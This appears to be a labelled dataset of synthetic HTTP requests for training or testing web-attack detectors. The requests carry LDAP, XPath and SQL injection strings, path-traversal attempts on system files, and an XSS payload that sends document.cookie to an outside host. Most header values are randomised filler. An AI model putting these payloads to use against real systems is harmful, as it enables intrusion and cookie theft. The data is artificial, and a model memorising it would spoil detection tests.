Date: Thu, 12 Aug 04 22:44:00 UTC
ETag: "tzNRwsuen.u4CaPKh"
Expect: L2fr=taeh2;o6alf
From: 37idSerd@ombp.uk
If-Modified-Since: Sun, 05 Sep 04 24:15:02 GMT
If-Unmodified-Since: Fri, 23 Dec 05 16:31:24 CET
If-Match: *
If-None-Match: "r4ESYJlWLnUn0xJQgv67"
If-Range: "sfj@VJX@v8_BJpBn@uF"
Max-Forwards: 0
MIME-Version: 1.8
Pragma: NuD='0dtugo9'
Proxy-Authorization: Basic aHRybng6ZWxMYQ==
Authorization: ue0n Ftyeimsl=fegaMEnt
Range: 09660-850419
Referer: /ao7ei.gif
TE: deflate,trailers
Trailer: Proxy-Authorization
User-Agent: fyazrrni (ltu7cx; nEjcRzT; hg7QLdPKm; pzyfbgAxu)
UA-CPU: x86
UA-Disp: 220,5543,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 352x848
Via: 2.7 218.127.34.24
Transfer-Encoding: hyjlh8; h88og=mtjiTugS
Upgrade: eylet/4.8, moe/0.2, jtiu/7.5, ratas/1.7, ott/5.5
Warning: 096 42.244.161.150:67 "Tarraeaaint" "Sat, 16 Oct 04 16:51:00 GMT"
X-Forwarded-For: 65.185.122.174
X-Serial-Number: 33909969
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44227
Start - Id: 37539
class: LdapInjection
POST /qW@J0pb7occX/toymwhtosf.jpeg? HTTP/1.1
Content-Length: 132
Content-Language: 6zyd4Me,sepc8ntR,hrhOz2tB
Content-Encoding: deflate
Content-Location: http://www.7Icelt5.com/NecRb9/seidnF/ns0g.exe
Content-MD5: SXRlb2NyZ2ZjbERzZHBzaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Oct 07 19:40:03 CET
Last-Modified: Tue, 14 Mar 06 23:41:22 GMT
Host: 195.205.6.56
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-8859-4;q=0.6, hz-gb-2312, utf-7
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 10.34.107.160
Cookie: qNi_LslQinwinnte=?10;bosndNetiaetu=|hb;ZexbSYTautoexecQ.=mVZ5rjCUn;cumvs80av=oQYczt-;NlLMelathhru=tqhctDhclunh
Cookie2: $Version="02"
Date: Fri, 13 Feb 09 01:51:59 CET
ETag: "cvwP9_XN-CuZEemWyx2y"
Expect: 100-continue
From: nIt1h@rvrs.org
If-Modified-Since: Sun, 06 Apr 08 18:27:07 GMT
If-Unmodified-Since: Tue, 08 Jun 04 23:19:38 GMT
If-Match: *
If-None-Match: "0js1S6QGMgvCTJRH"
If-Range: *
Max-Forwards: 96
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: rertml hneO5=eocht
Authorization: edssen gudohr1a=luooomT
Range: 0516-7855,069180-,334-
Referer: /Dmny7u6/ievleU/oaVnh/sIetneeE.php3
TE: chunked
Trailer: TE
User-Agent: e4QiTuudAoaeitri
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 523x786
Via: dqhx/9.3 www.3aosh.html, 9.7 www.afuRoia.png
Transfer-Encoding: deflate
Upgrade: uTzmh/1.6, onhq/1.4, ecsat6/1.2, etDno/7.8
Warning: 162 www.befnhlc.css "osea53nrTepho" 
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~

ohmWmT04tae=79tEt8ot6r&stanrIjfoe= o|&4GIbetween9pfblq=)   ( |   (    cn=*o  'brien*    )(mail =*o 'brien* )

End - Id: 37539
Start - Id: 35504
class: XPathInjection
GET /ds6RIyDD0hjyb.mdb?j1LLPaX7WBD=sn+caqhhd&unionY_xKoB=128 HTTP/1.0
Host: www.aoo8rsmto.uk
Connection: degt6um
Accept: */*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 181.43.90.86
Cookie: dpdqeoeiLtrkxue=IeoBoltucrxh7lo;smos6Wrhue=eYXK9Rghief;ht8at=mr'  or     (i     < count(pzr/child::text())  and    j   <   count(zu/child::comment())     and k   <     count(e7hoit/child::*)   )     or  'anene'  =  ' lbEt'     or;mdur=88
Cookie2: $Version="2"
Date: Mon, 09 May 05 17:46:37 GMT
ETag: "oX0ZLG2v9P.-wmTSWyiu"
Expect: 100-continue
If-Modified-Since: Thu, 05 Jun 08 16:11:22 GMT
If-Unmodified-Since: Sat, 09 May 09 03:12:19 CET
If-Match: *
If-None-Match: "lO6_2keAThG@z2R3D"
If-Range: Thu, 11 Oct 07 17:17:45 GMT
Max-Forwards: 3112
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Basic ckQ5bmdhOnN6aXJkNA==
Authorization: Digest nonce
Range: 76101-
Referer: /erlacrDe/hded/otYtnco.jsp
TE: trailers,trailers,deflate
Trailer: Upgrade
User-Agent: Mozilla/1.5 (X11; U; Open BSD i586 1.1; NF-ae; rv:3.8.2) Gecko/69985427
UA-CPU: x86
Via: HTTP/1.4 134.164.225.198
Transfer-Encoding: deflate
Warning: 037 www.ramdut.png "awsh" 
X-Forwarded-For: 70.179.167.130
----: --------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 35504
Start - Id: 42644
class: SqlInjection
GET /v0iOrslwtusryuze/se/od@k_uhttps0bin0/ddnaltfisx0ts1/hIjes1hadCmmFaopI/8P_FWZdRl@W1/y9s0eimWygcenv/Tot/VVN/apwnlEier.css?taio5otse=%27+OR++%27tocsrnioarg%27++%3D+++%27+++&salds=wIIZ HTTP/1.1
Host: www.ea4thrsstb.it:192
Connection: dtcei
Accept: audio/x-wav, application/*;q=0.2, application/zip;q=0.9
Accept-Charset: iso-8859-9, isiri-3342;q=0.8, windows-1252;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 75.23.100.154
Cookie: EnullC1TzJreplaceg=83oM
Cookie2: $Version="792"
Date: Thu, 29 Oct 09 20:04:05 UTC
ETag: "w8Zou2YQekyqpbQNzJ"
Expect: 100-continue
From: z74ht@xqb9ivEose.gov
If-Modified-Since: Wed, 26 Dec 07 17:20:41 UTC
If-Unmodified-Since: Thu, 13 Jul 06 14:40:50 GMT
If-Match: "ExamKPEtgjPtMRyFq"
If-None-Match: "EWA4XuiOH33TCLJY@uJ3"
If-Range: "gfx5L.uKa_oSGxQtqe"
Max-Forwards: 6260
MIME-Version: 3.2
Pragma: Bll6o=whtnbe
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: Digest nonce
Range: 72326-9838
Referer: http://Eces.uk/iine.tiff
TE: chunked
Trailer: Max-Forwards
User-Agent: oe8ti7/6.3.0.7.4
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4720x346
Via: FTP/0.7 136.93.198.77:38
Transfer-Encoding: deflate
Upgrade: hoefdi/5.8, afmr09/0.6, fgj/9.1, mds/0.8, 8sseh/8.0
Warning: 577 221.133.112.12 "Eaaers" 
X-Forwarded-For: 32.163.55.249
X-Serial-Number: 81024686129
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42644
Start - Id: 38926
class: LdapInjection
GET /5bO0/EcNKusrzTZ4ycosfW/e3lvxc_1p.w58N9rEUE/ogifsC2u8tzxhn/ivE/tjepy95iyo1vt/6@q/tO8mf5kr_ehUmKODG.bin?abii=l5cToweasle4eaali&iea=yS%29%28+++%7C+%28t6b6o%3D*%29&hksAPud9=39447&U3X5jlogSMLEDP=G&i9ejnm=rd0&e1emsfutetNA=18&etI=364&lemEcocmei=ddhavingt&Etodpttlv=hCL05oQSOVB&3tairac=em&ntilphriasi=rjwp5xreaaasdd&norac2io=aerrn HTTP/1.1
Host: 137.27.156.79
Connection: close
Accept: text/plain;q=0.2, video/*;q=0.9, audio/basic
Accept-Charset: x-mac-roman;q=0.2, iso-8859-15;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 200.72.166.1
Cookie: Un=mej;tohslmly=er<tm
Cookie2: $Version="0"
Date: Wed, 29 Jun 05 07:18:59 CET
ETag: W/"7-6odv1wYFQZCrb4v"
Expect: t21byh
From: Utnn8c@iodssieo.biz
If-Modified-Since: Sun, 19 Oct 08 07:21:34 CET
If-Unmodified-Since: Sun, 12 Jul 09 14:21:09 GMT
If-Match: *
If-None-Match: *
If-Range: "MYRQCqk8qSHIPwLO"
Max-Forwards: 24
MIME-Version: 7.2
Pragma: emid=ct
Proxy-Authorization: mtSl wopwaseh=raeaa
Authorization: Digest qop=auth-int
Range: 49-,0149-664723,864-
Referer: /ajTDoco5/rialh.avi
TE: chunked;q=0.0
Trailer: Pragma
User-Agent: 1amssil/8.7.9.1.9
UA-CPU: Sparc
UA-Disp: 518,9521,8
UA-OS: Windows 98
UA-Pixels: 024x188
Via: FTP/2.6 www.elUihiei.png, HTTP/8.6 113.21.215.92, 8.3 121.63.118.97
Transfer-Encoding: deflate
Upgrade: tydnft/3.9, LrdO/1.4, een6vn/4.0
Warning: 241 39.229.17.174:8 "buhh0su2aszm" 
X-Forwarded-For: 212.86.228.108
X-Serial-Number: 498357729
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38926
Start - Id: 38283
class: LdapInjection
GET /IcOtaeson/newpioN/5UpdKP30APxkr7pZX9v/nhd/usb0bo1rEettultgn.asp?aHnuKcde=n+vmvbscript0a&laarsde=%29+%28%7C++++%28displayName%3Dhad*%29++%28name+++%3D++++had*++%29%28++++mail%3Dhad*+++%29&Eiotepheiy=xe9x&3F@UKneKk=16961511&8kxhaving0=%5Bnl&ioenarrGl0tqtkr=alyAuE0h&0kOowlkuocia=uegutMr82&Texec81u2=mu&YTV4odautoexeci@=97&ohiseTNDouer=Y HTTP/1.0
Host: www.ensAoio.fr
Connection: keep-alive
Accept: audio/*, image/jpeg;q=0.7
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-age=8516
Client-ip: 84.115.43.134
Cookie: ghysawinmg=7;roC2om-7mBn.=6xGUa;illHaiduyhyamat=t?ri;ok5ro1t7esGv=8nE;a0yAd=hbij0e0ew7Oe7rsiap
Cookie2: $Version="09"
Date: Wed, 28 Mar 07 15:35:16 UTC
ETag: "PQfR0GPb5_qfPgRPEHx5"
Expect: 100-continue
From: 5alnury@nfraofye9.st
If-Modified-Since: Thu, 26 May 05 20:13:30 UTC
If-Unmodified-Since: Wed, 30 Jul 08 21:12:25 CET
If-Match: "7uF4rt4cs9nJ-76"
If-None-Match: "ZKlCn8iQaK3VYlo"
If-Range: "GMQmSR@Mlmy3hla8I"
Max-Forwards: 941
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest username="mscm"
Authorization: giVs8 eeKeyt=oedhece
Range: 339-28315
Referer: http://e90dH.org/romdtbo/u6ai0evb/mtfaeJzy/tf7sBc.bin
TE: deflate,deflate;q=0.3
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.4 (compatible; he1ehklto; Open BSD i386; n5tl; cnnorg; eEhkrnui)
UA-CPU: PowerPC
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 205x286
Via: HTTP/2.7 188.62.144.35:64388, 5.4 www.earqh.tiff
Transfer-Encoding: deflate
Upgrade: segoo/3.8
Warning: 319 133.132.138.49 "aLcsnAauiahn" 
X-Forwarded-For: 192.211.108.16
X-Serial-Number: 96070226298978376
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 38283
Start - Id: 36889
class: LdapInjection
GET /h_jL_F0ieb@CKZN8qtb/pUkbRX/ss-_OGLVDJ9fc/_B/tsej4mon2/9tnlpyT/mciir/wuBE/l93.htm? HTTP/1.0
Host: www.aeCn.st
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: T-n, n-ILivUts6, hTaes-st;q=0.9, m-m1;q=0.9
Cache-Control: no-cache
Cookie: ireszuqui=282838;wth0t9hrD=eign;ccse7sdce4Tul1=)  ( |    (displayName=had*)   (name    = had*)( mail=had*   )
Date: Tue, 01 Jan 08 15:44:50 CET
ETag: "LCVMi4GwpuS5eHGZqjN"
Expect: hda4oss=sytee
If-Unmodified-Since: Sat, 13 May 06 04:44:22 UTC
If-Match: "Ofd6UR1IJt@@VOC"
If-None-Match: "wueN4JA3T4GYj2N178"
Max-Forwards: 363
Pragma: ons8oBh='u'
Authorization: NTLM eW5lbm5VM215cmhobWVkbmV0bzBpYWVlaGZpeWNuaWg5dXV0b1RlM005aXM=
Range: 158-39,21618-
Referer: http://EisFaTtM.fr/nl7r/sdSdze.fgf
User-Agent: avnslp (ig3aF1Y; 5yyTdRU7X4; o83kyr; eFLgC9Y; e26W31)
UA-CPU: Sparc
UA-Color: color8
Transfer-Encoding: compress
----: -------------------

null

End - Id: 36889
Start - Id: 48489
class: XPathInjection
GET /erim0lnt8elrovyj/e3ihihaeo5sbqetec/libttds3oidasrh4/13aoyk@k9/h.rBTQ/1a/Ieval.shtml?3neAeh=7&uNh8iNc=2&baedhdyywria=412520362&lJ9eval-QKf=jtZ.&1xl5eg8c1=0132766&stdtm=e-&gbuY1YKnNN=echoa+%276nlcnull6aeu HTTP/1.1
Host: www.Noan.gov
Connection: r8hE
Accept: application/rtf
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: p6t2q7Fp=rRmomAm
Client-ip: 209.69.144.246
Cookie: dsbEz=ees'   or  path/child::node()[position()=N]    or     'sadig'  =  ';sasauNNksec0o= rtt;r7gt4nrohi=nwrbpmmotlgumhae
Cookie2: $Version="258"
Date: Wed, 18 Oct 06 03:38:09 UTC
ETag: W/"QL0nDhv.OLr-OCWOF9d"
Expect: 100-continue
If-Modified-Since: Sun, 21 Jun 09 07:32:10 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Dec 07 24:16:47 CET
Max-Forwards: 5754
Pragma: Troetg=S5t0vlsb
Authorization: NTLM bm5ZYU1ldTFuclNub2x0VWlwbzhLbnVxdW5wbGFpdGd4cXRLb3RMZWZEZGlhdw==
Range: 2833-50623,-7,319-
Referer: /efthoa3o/sant5/lodws1sl/aihHt4c/evhySw.avi
TE: gzip,trailers
Trailer: Host
User-Agent: e8HMo (aji8D_xd78; lVUhPg5; sX.cJmMZ)
UA-Disp: 100,3687,8
UA-Color: color16
Via: 2.3 77.175.225.99
Transfer-Encoding: compress
Upgrade: azokf/9.7
X-Serial-Number: 5936575
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48489
Start - Id: 37741
class: LdapInjection
GET /t8qG9QUx./yhtNloh6/aC/nr5eab2/sMltW/mbt4y5i.htm?adce0hqeteaIcig=te&meu5LwouSnfkIe=%29+++%28+++%7C%28+cn%3D*o++%27brien*+%29%28mail+++%3D*o%27brien*+%29+++&bm0nWBAN=0922&snsd=lxs%2Feo&ykA9=oplhicjeusdalee&iframeGp51Sevalbgsoundexecjo=open%40&ldaetmjtnudgp=37e&ienar64ftif9e=8fp&13lrtmr7age=9242239 HTTP/1.0
Host: 73.189.154.190
Connection: close
Accept: video/quicktime
Accept-Charset: *;q=0.5
Accept-Encoding: identity, gzip;q=0.1, identity
Accept-Language: td-mbj, bhjn-tiacc, or-0r;q=0.6, en7s-hE;q=0.9
Cache-Control: max-stale=6
Client-ip: 176.160.67.197
Cookie: ede9hba=1531391
Cookie2: $Version="7"
Date: Mon, 26 Jun 06 24:13:24 CET
ETag: "O7n8cheml6sy0-OowP8"
Expect: 100-continue
From: ft5sbsfs@ttt1ze.uk
If-Modified-Since: Sat, 09 Dec 06 09:03:57 GMT
If-Unmodified-Since: Mon, 17 Dec 07 24:28:05 UTC
If-Match: "72I_uXwtGbmvnQHen"
If-None-Match: *
If-Range: Mon, 21 Dec 09 23:37:20 UTC
Max-Forwards: 3903
Pragma: no-cache
Authorization: Basic bXZ4bU5tbTp2dG1uZQ==
Range: 79793-4
Referer: http://tnaHb.st/t6uiaeo0/uotl/mwoeue.php
Trailer: Date
User-Agent: Mozilla/1.1 (Machintosh; U; PPC Mac OS X 9.1; ni-Nr; rv:0.3.9) Gecko/86011700
UA-CPU: MIPS
UA-Disp: 242,7372,32
UA-OS: Linux
UA-Color: color32
Via: 5.9 30.108.221.49:97610
Transfer-Encoding: gzip
Upgrade: esS/4.5, qssn/5.3, wig/2.0
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 33.253.224.201
X-Serial-Number: 3350612
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37741
Start - Id: 35696
class: XPathInjection
GET /nAi5CRcRY/s.6sozee-..kZ14C_Yv/hGxUt.gif?2body38.lyOX=fstno&sfaicyi55cd=ibOpcwdSim&assaouyORbsuE=0431620&sf44=6&ndOaoh8wchn8t2=5886557&n8Dseei1ct=38984+or+++1%3C++d%2Fc%2Fr4ta%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D8%5D+++or+++++306%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&Asi=22321&soirrsN7n=tNs&sl=tLc&ett5l=vea HTTP/1.1
Host: www.oeen.net
Connection: OJsAnt
Accept: audio/*, text/*
Accept-Charset: shift_jis;q=0.0, koi8, iso-2022-kr
Accept-Encoding: 
Accept-Language: s-es4, p9e-us0te5sf, ysnagEo-8morom, nreEkam-anh6;q=0.6, i-o8uauiE
Cache-Control: min-fresh=72242
Client-ip: 87.168.72.128
Cookie: goprlu=nnsnwi9wosce;alys=eolauvE6ftby
Cookie2: $Version="0"
Date: Thu, 26 Aug 04 04:27:41 CET
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: fbtsncr
From: xcsXifnE@tneljth.ch
If-Modified-Since: Wed, 11 Jul 07 16:10:40 UTC
If-Unmodified-Since: Sun, 13 Jun 04 22:51:34 GMT
If-Match: "ce@W19j08Dn-LyjapeEN"
If-None-Match: "rlzk8rqxdGrIZMUJF"
If-Range: *
Max-Forwards: 5149
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: ndsOth k8so=nlmc
Authorization: Basic cmF0YzpzaHFUOQ==
Range: 5225-,8-9,1-
Referer: http://N3hfn.org/rdaeT/aedupza/wnc3wki3/wsec.avi
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/9.0 (compatible; nrwr; Open BSD i586; htedg9; rrtzepcg)
UA-CPU: PowerPC
UA-Disp: 9150,2216,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 656x763
Via: FTP/3.8 176.165.200.193
Transfer-Encoding: identity
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 211.136.86.197
X-Serial-Number: 727389738621693748
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35696
Start - Id: 45990
class: PathTransversal
PUT /gptsr.shtml? HTTP/1.1
Content-Length: 61
Content-Language: e6n,didod9e
Content-Encoding: compress
Content-Location: http://www.tteh.it/loi7afn/0usch8go/rtjSfsi/emvbl.avi
Content-MD5: YXR0b3RyYWFBZnRkb2FlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 09 Feb 10 03:42:27 UTC
Last-Modified: Wed, 26 Jan 05 23:02:39 CET
Host: www.tsspnpu.it
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman;q=0.5
Accept-Encoding: 
Accept-Language: i-eetsahe
Cache-Control: only-if-cached
Client-ip: 178.115.28.215
Cookie2: $Version="7"
Date: Mon, 07 Jan 08 08:27:21 CET
ETag: W/"eShm8sspslpthVAco"
Expect: 100-continue
If-Modified-Since: Sun, 02 Apr 06 18:35:50 UTC
If-Match: "QXpiQIdik8i.K86vtu"
If-Range: "wi-@hWX80oqrbqHaAoxq"
Max-Forwards: 647
MIME-Version: 2.0
Pragma: no-cache
Authorization: Digest uri=http://mnfodtia.cz/tiiahx/oi5uhns/aaoopgo/sd1iRb5c/Tenswol.sh
Range: 00820-,3-
Referer: /ltn9e/roee/empipps.js
TE: deflate;q=0.7,gzip;q=0.0
User-Agent: ..........................WINNTsystem.ini
UA-OS: Linux
UA-Color: color16
Via: HTTP/0.2 www.ipt9r9kt.png:79657, 4.3 92.232.151.123
Transfer-Encoding: gzip
Upgrade: oslm/8.0, rot68/4.3, htrf/4.1
----: ----------------

UkPh= eval'5replaceore@e0/&mtN=477391&7tgsO=passthrucso

End - Id: 45990
Start - Id: 45762
class: PathTransversal
GET /Ft/uxGZ3LID3aF.y/tZ3yl1P12/ettitalTaPsnp/YhqAFhYQselectT.exe?Gnfy=i%3A%5Cwindows%5Cboot.ini&urdadpgPknEFe=%3C6ons3drhs+ew&esivapr=773&a9dzbGy=057 HTTP/1.0
Host: www.9eal.gov
Connection: keep-alive
Accept: image/gif, audio/*;q=0.3, image/gif
Accept-Charset: x-mac-chinesesimp;q=0.1, windows-1255;q=0.0, iso-8859-1, shift_jis;q=0.2, iso-8859-8-i;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=677
Client-ip: 94.195.108.172
Cookie: topeNaOserega=l]i;i.nw9hs3=Ot'1h;aabsoita=lhdrtettlOityeTi;fi30sa=ixjRqkI;deser=ore
Cookie2: $Version="51"
Date: Wed, 07 Jun 06 15:39:33 UTC
ETag: W/"EaLlJ5.7fb5tH.oBcSU"
Expect: aameaew
From: EelBbSo@eeaysiht.net
If-Modified-Since: Wed, 11 Mar 09 15:21:02 GMT
If-Unmodified-Since: Wed, 01 Oct 08 17:47:01 UTC
If-Match: "phZOoCP_Yg8fQDTwm"
If-None-Match: *
If-Range: *
Max-Forwards: 512
MIME-Version: 8.4
Pragma: yireiEs='newnt'
Proxy-Authorization: Basic eXNFS21yOkxxaEhs
Authorization: Bid3jw ermmy=OefhS
Range: -500252,934-3694
Referer: http://qbheblr.org/asnnc/omoe/tgtsSinr.jsp
TE: deflate;q=0.2,deflate,chunked;q=0.1
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.5 (Windows; U; Windows NT 2.6; oi-dI; rv:1.4.8) Gecko/65346224
UA-CPU: MIPS
UA-Disp: 0244,7553,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9810x7556
Via: FTP/1.5 72.252.178.74
Transfer-Encoding: identity
Upgrade: tlly5t/1.5
Warning: 366 www.qjwrkE.jpg:272 "oMcna8llngods" 
X-Forwarded-For: 173.239.216.61
X-Serial-Number: 8409681186997
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45762
Start - Id: 47808
class: XSS
GET /rt/foPYaRg@G@PfbT/4DymF0vi6nNBEbcIiHp/c5VE2S.Cu8/umsf/r@_/pfXDVRVq/DFzhUlogechoBywrW/rJLliframe00/tltk4VjZyA.css?bhf3enoetDla25=l&p7=49176&9sll08=549713960&rTshlothwhoo4oc=%3Cobject++++classid+++%3D++++%22+clsid%3A...%22++++codebase++++%3D%22+++++javascript%3A++++%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.tira.com%2Fcgi-bin%2Fes.cgi%27%2Bdocument.cookie%29%3B%5D+%22%3E HTTP/1.0
Host: 170.173.186.101
Connection: keep-alive
Accept: */*
Accept-Charset: macintosh, utf-8
Accept-Encoding: 
Accept-Language: plmrndm-ahE6wNio;q=0.0, lf-roene;q=0.4, 3bicet-or6xqwe;q=0.9, eyendh-it1;q=0.1, n6o5l-fposes;q=0.2
Cache-Control: no-cache
Client-ip: 203.27.77.55
Cookie: reJ1nuepm=87388;MQ6RE1f=oig;05Z765.oFAhavingE=anETnpNscdH;XGY7Xv-httpunionF= htpass5c]ls-8tqeohr;ro1b8Wktmbqf=wo
Cookie2: $Version="5"
Date: Wed, 19 Mar 08 04:54:17 GMT
ETag: W/"NIPiNBIpDeDPeGkY13"
Expect: 100-continue
From: shnba@roottg.it
If-Modified-Since: Tue, 24 Jun 08 20:35:08 UTC
If-Unmodified-Since: Sun, 29 Jan 06 08:00:02 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 01 May 09 14:41:21 GMT
Max-Forwards: 637
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest username="oaid"
Authorization: Digest opaque="e8ts9it"
Range: 2820-37,-5180,81-
Referer: /u9UNe.aspx
TE: trailers,deflate
Trailer: Accept-Encoding
User-Agent: ekzmrov (hlb-@OFg; fWZmvGV8_; rNQ.W2qJ; iu6EzLn4)
UA-CPU: x86
UA-Disp: 191,879,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9392x482
Via: HTTP/0.5 7.11.105.199, 3.3 247.22.173.87
Transfer-Encoding: gzip
Upgrade: sdmaat/7.9
Warning: 315 223.24.177.34 "gnbpnesajImnUauppEa" "Thu, 03 Jun 04 13:41:49 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 637705513942579260
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47808
Start - Id: 37610
class: LdapInjection
POST /lijfot8j/hKnw/b3E/hkmxZJSJHTxyRVg-i@/ufS7KKgQSbo/8-khBd4v.asmx? HTTP/1.1
Content-Length: 141
Content-Language: 8,xilfaaji,td
Content-Encoding: gzip
Content-Location: /ainrleh/rslSoos/eakN.fgf
Content-MD5: ZWlBdzVlaXRrb05XdGVkdg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 29 Nov 08 10:01:45 CET
Last-Modified: Wed, 17 Jun 09 23:05:25 GMT
Host: www.erlafoeede.be:80
Connection: ecodis
Accept: image/*;q=0.5, video/*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 34.23.57.157
Cookie: ze9BlocationZ=732496;9etha9stahwo9=eandhpg;.ByWM_eEdelete=Sde;iamJsi8ePtC7N=libde]ei ohssg/p\e
Cookie2: $Version="98"
Date: Sun, 01 Oct 06 14:25:30 GMT
ETag: "@QX@_ywUL101QKMd"
Expect: tadtati=ehee;deeu=eDczsw
From: tiwatv@kDh9.de
If-Modified-Since: Fri, 20 Oct 06 23:52:02 CET
If-Unmodified-Since: Fri, 30 Mar 07 15:18:20 UTC
If-Match: *
If-None-Match: *
If-Range: "buN_osqCaUm3gC2f"
Max-Forwards: 5
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: wCwbd1 E1saai=4olnf
Authorization: 9zero hxpb=aiseetc
Range: 9-3321,97916-131
Referer: /vjtntr/eoseey/j6et/dsgI/41ynm5.tar
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/8.1 (X11; U; Linux i386 5.2; az-tc; rv:3.4.8) Gecko/79873927
UA-CPU: PowerPC
UA-Disp: 2548,1743,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 770x317
Via: HTTP/0.8 119.213.14.150, 1.5 www.eodt.html:0569
Transfer-Encoding: deflate
Upgrade: roOt/4.0, lDulw/0.4, tsto/6.6, teepwe/5.4, uyq/3.7
Warning: 884 75.45.43.166 "cemm8l" "Sun, 10 Jul 05 20:22:37 CET"
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

uhrp=7770661&3kousiketood=ajrth&Pst=Hnrtaynin&uu5wyyak1mdrost=5201)(&(objectClass=rNR)(|(sn=  lt)(cn=qpm   J*))

End - Id: 37610
Start - Id: 44996
class: PathTransversal
GET /03uTvBXKsystem/fhwRQ.jpeg?eho=6693593&ieate95otHatur=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml HTTP/1.1
Host: 69.56.12.61
Connection: deods
Accept: video/mpeg
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.6, deflate;q=0.2, deflate
Accept-Language: *
Cache-Control: no-transform
Cookie: 0ajNC=0ttRrg(u i/o4t;eohkt=Ezetd
Cookie2: $Version="420"
Date: Sun, 28 Nov 04 23:42:16 CET
Expect: geoa=c7iean2o
From: SiHai3@Rl2imga.fr
If-Modified-Since: Fri, 24 Jul 09 10:43:45 GMT
If-Unmodified-Since: Wed, 05 Jul 06 08:37:33 GMT
If-Match: "vcNAWj4i2EIhvtQnGJc"
If-None-Match: "mN62FTj-AKEOiZM"
If-Range: *
Max-Forwards: 8584
MIME-Version: 6.7
Pragma: Erlbctap='ctsoedr'
Authorization: NTLM ZXJpNnJldGhrU2VkczFlbTl4ZWxlaVJ2R2d6bnJhdm9zTXpOaTRmaG5vMGJi
Referer: /art6db/owhlEd/enlm.jsp
TE: gzip,trailers,trailers
User-Agent: I3d22nahnago0setaRw
UA-Disp: 6840,695,32
UA-Pixels: 7442x124
Via: FTP/6.5 57.25.109.39
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44996
Start - Id: 49223
class: XPathInjection
GET /otu/Eev9thhpnwsliEhh7jod/ius/1MnuPhsEVpositionUxp_/tXYN/oc/beZNearucoees/suu6PAQd48-FR/aaoue.pl?ewqpixiu7t3mdO=TaRthne%27%5D+%7C++++P+++%7C+++%2F%2Fuser%5B++name%2Ftext%28++++%29%3D++%27muiea&lhtgt=pki%3CllrehBeOeht+dt-h HTTP/1.1
Host: www.lhybs.st
Connection: Tfntedwo
Accept: text/plain;q=0.9
Accept-Charset: *
